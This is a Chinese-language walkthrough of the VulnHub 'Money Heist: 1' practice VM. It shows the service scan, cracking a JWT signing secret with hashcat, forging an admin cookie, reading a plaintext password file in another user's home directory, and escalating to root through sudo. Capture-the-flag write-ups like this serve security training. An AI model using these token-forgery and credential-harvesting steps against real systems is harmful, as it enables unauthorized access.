Money Heist: 1 vulnhub walkthrough

最新推荐文章于 2023-06-07 16:15:48 发布

原创最新推荐文章于 2023-06-07 16:15:48 发布 · 832 阅读

0 ·

本内容遵循CC 4.0 BY-SA版权协议

vulnhub 专栏收录该内容

15 篇文章

订阅专栏

本文是针对Money Heist 1虚拟机的渗透测试过程详解。首先通过服务探测和Web渗透测试，发现80端口注册后需越权操作。利用JWT token进行base64解码，并使用hashcat破解secret-key。解密后修改cookie获取管理员权限，从而得到admin flag。接着通过SSH登录berlin用户，分析流量包找到professor用户密码，切换用户后获取root权限和最终flag。

Money Heist: 1

虚拟机页面：http://www.vulnhub.com/entry/money-heist-1,592/

Description

“The Professor” has a plan to pull off the biggest heist in recorded history – to print billions of Flags . To help him carry out the ambitious plan, he recruits eight people with certain abilities and who have nothing to lose.

服务探测

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
53/tcp   open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
80/tcp   open  http
3000/tcp open  http    Node.js Express framework
3001/tcp open  nessus?

web渗透测试

访问80端口，注册用户后提示不是管理员用户。很明显是要求越权，于是查看cookie。
在这里插入图片描述 no-flag jwt token，base64解码后为

{
  "email": "test1@test.com",
  "iat": 1604066840,
  "exp": 1604070440
}

先用hashcat爆破一下secret-key为professor。

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJlbWFpbCI6InRlc3QxQHRlc3QuY29tIiwiaWF0IjoxNjA0MDY2ODQwLCJleHAiOjE2MDQwNzA0NDB9.68Qh1wCLajO59G6BepaQirUUyTOf_IgHwsgvLew_UPE:professor

放到jwo.io中，修改email为admin，修改cookie后刷新网页，成功获取admin flag。
flag ssh登录berlin（这走了一点弯路，该用户目录下有一个流量包，分析了半天发现只是berlin与nairobi的对话），进入home目录，发现可以进入professor用户目录。

berlin@ubuntu:/home$ ls -all
total 28
drwxr-xr-x  7 root      root      4096 Oct 13 03:06 .
drwxr-xr-x 24 root      root      4096 Sep 24 17:41 ..
drwx------  5 berlin    berlin    4096 Oct 16 13:27 berlin
drwxr-xr-x  3 root      root      4096 Sep 23 16:48 .ecryptfs
drwx------  4 nairobi   nairobi   4096 Oct 16 14:51 nairobi
drwxr-xr-x  4 professor professor 4096 Oct 16 18:06 professor
drwx------  5 tokyo     tokyo     4096 Oct 16 14:01 tokyo
berlin@ubuntu:/home$ cd professor/
berlin@ubuntu:/home/professor$ ls -all
total 32
drwxr-xr-x 4 professor professor 4096 Oct 16 18:06 .
drwxr-xr-x 7 root      root      4096 Oct 13 03:06 ..
-rw------- 1 professor professor 1180 Oct 30 19:34 .bash_history
drwx------ 2 professor professor 4096 Oct 13 16:41 .cache
-rw-r--r-- 1 root      root      4465 Oct 16 15:18 finalflag.txt
drwxrwxr-x 2 professor professor 4096 Oct 14 10:36 .nano
-rw-rw-r-- 1 professor professor   28 Oct 16 18:06 passwd.txt
-rw-r--r-- 1 professor professor    0 Oct 13 16:43 .sudo_as_admin_successful

passwd.txt为该用户密码，切换到该用户下，成功获取root和flag。

berlin@ubuntu:/home/professor$ cat passwd.txt 
st@y_tuned_for_@nother_one

berlin@ubuntu:/home/professor$ su professor
Password: 
professor@ubuntu:~$ sudo -l
[sudo] password for professor: 
Matching Defaults entries for professor on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User professor may run the following commands on ubuntu:
    (ALL : ALL) ALL
professor@ubuntu:~$ sudo cat finalflag.txt 



                    ██████╗ ███████╗██╗     ██╗      █████╗      ██████╗██╗ █████╗  ██████╗                             
                    ██╔══██╗██╔════╝██║     ██║     ██╔══██╗    ██╔════╝██║██╔══██╗██╔═══██╗                            
                    ██████╔╝█████╗  ██║     ██║     ███████║    ██║     ██║███████║██║   ██║                            
                    ██╔══██╗██╔══╝  ██║     ██║     ██╔══██║    ██║     ██║██╔══██║██║   ██║                            
                    ██████╔╝███████╗███████╗███████╗██║  ██║    ╚██████╗██║██║  ██║╚██████╔╝                            
                    ╚═════╝ ╚══════╝╚══════╝╚══════╝╚═╝  ╚═╝     ╚═════╝╚═╝╚═╝  ╚═╝ ╚═════╝ 


    ██╗      █████╗      ██████╗ █████╗ ███████╗ █████╗     ██████╗ ███████╗    ██████╗  █████╗ ██████╗ ███████╗██╗     
    ██║     ██╔══██╗    ██╔════╝██╔══██╗██╔════╝██╔══██╗    ██╔══██╗██╔════╝    ██╔══██╗██╔══██╗██╔══██╗██╔════╝██║     
    ██║     ███████║    ██║     ███████║███████╗███████║    ██║  ██║█████╗      ██████╔╝███████║██████╔╝█████╗  ██║     
    ██║     ██╔══██║    ██║     ██╔══██║╚════██║██╔══██║    ██║  ██║██╔══╝      ██╔═══╝ ██╔══██║██╔═══╝ ██╔══╝  ██║     
    ███████╗██║  ██║    ╚██████╗██║  ██║███████║██║  ██║    ██████╔╝███████╗    ██║     ██║  ██║██║     ███████╗███████╗
    ╚══════╝╚═╝  ╚═╝     ╚═════╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝    ╚═════╝ ╚══════╝    ╚═╝     ╚═╝  ╚═╝╚═╝     ╚══════╝╚══════╝

                                      $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
                                      --------------------------------------------                                                                                  
                                      You have successfully completed the $ HEIST $ .
                                      --------------------------------------------
                                            Created by Team :- VIEH GROUP
                                            -----------------------------
                                            Visit us:- www.viehgroup.com
                                            -----------------------------
                                            Twitter :- @viehgroup
                                                       @shaileshkumar__
                                                       @shrey_sancheti
                                                       @manish67367326
                                     ---------------------------------------------
                          -->> flag4{W3@kn3ss_!s_not_!n_us_!t_!s_!n_wh@t_w3_h@ve_outs!de} <<--
                                     ---------------------------------------------
                                     $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$